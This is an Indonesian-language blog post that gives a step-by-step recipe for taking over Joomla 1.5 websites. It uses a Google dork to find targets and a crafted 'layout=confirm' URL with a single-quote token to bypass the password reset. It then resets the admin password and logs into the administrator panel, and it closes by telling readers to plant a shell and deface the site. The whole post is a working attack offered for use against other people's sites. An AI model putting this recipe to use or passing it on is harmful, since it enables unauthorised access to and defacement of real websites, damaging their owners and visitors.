Kali ini kita targetkan joomla versi 1.5. Dengan menggunakan exploit berikut, kita bisa mereset sandi dari web tersebut dengan password yang kita inginkan. Tertarik? Simak dengan seksama.
1. Ketik dork berikut ke kotak pencarian google : inurl:option=com_user
2. Akan ada beberapa web disana. Buka salah satunya. Nanti web yang kita buka beralamatkan seperti ini :
http://site.com/index.php?option=com_user&view=reset
atau
http://site.com/index.php?option=com_user&view=login
atau
http://site.com/index.php?option=com_user&view=register
atau
http://site.com/index.php?option=com_user&view=remind
3. Sekarang, coba perhatikan view=reset, anda ganti tulisan itu dengan layout=confirm
Contoh : http://site.com/index.php?option=com_user&layout=confirm
4. Jika berhasil, akan muncul form token untuk mereset sandi dari web joomla tersebut. Isi saja kolom tokennya dengan tanda '
5. Jika berhasil, anda akan masuk ke menu reset password, nah isikan password baru yang kalian inginkan untuk login ke web tersebut nanti
6. Setelah proses reset sandi selesai, login ke web tersebut dengan username (admin) dan password baru anda melalui www.site.com/admin/ atau www.site.com/administrator/
7. Selesai, anda sudah masuk ke admin page web tersebut, tinggal otak atik aja webnya, tanemin shell lalu deface.
NB : Tidak semua web bisa di eksekusi dengan cara ini, ada yang sudah mem-patch webnya. Jadi jika anda beruntung, anda akan menemukan web yang belum di patch.
sumber http://blogerhat.blogspot.com/
No comments:
Post a Comment